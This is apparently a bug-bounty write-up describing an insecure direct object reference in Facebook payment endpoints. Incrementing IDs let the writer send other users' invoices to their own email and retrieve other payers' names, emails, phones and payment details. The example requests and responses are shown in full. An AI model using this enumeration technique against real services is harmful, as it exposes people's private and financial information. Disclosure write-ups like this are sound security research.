.png)
4 years ago
157 BOOK THIS SPACE FOR AD
ARTICLE AD
while I was testing on Facebook I found option to send invoice to email
this option is used in many palaces on Facebook ,ADS account ,business account , Instagram..
viewing the request of that options found out that using incrementing id
POST /fb-payment/7777777/send-email
in this request I could send any invoice to my email by changing the id
continue test found easier way to get invoices
POST /fb-payment/7777777/execute
the response for it was
{"amount":777,"payment_method_id":"EX","country":"EG","refrence_number":"777","order_id":"777","status":"pending","create_data":"2020-9-10T05:08:08"}continue search reading some documentation and some fuzzing found that I could use the “order_id” and “payment_method_id” to retrieve a payments information
which I can get this variables for all the users who tried that option from the previous request which is using incrementing id not random at all
Retrieve payments information
GETfb-payments?payment_method_code=XX&payment_id=XXXXXXXXXXXXXXXX&payer_amount=null¤cy=nulll&country=null&redirect=https://facebook.com
the response of this request was
{"id":7777777,"state":"PENDING","amount":400,"currency":"EGP","country":"EG","redirect":"https://facebook.com","payment_method_code":"EX","name":"Mustafa Ahmed",user_id:100,"email":"example@example.com""phone":"01111111111",user_agent":{"ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36","browser":{"name":"Chrome","version":"85.0.4183.121","major":"85"},"engine":{"name":"Blink"},"os":{"name":"Windows","version":"10"},"device":{},"cpu":{"architecture":"amd64"}}}
Bengali (Bangladesh) · 
English (United States) ·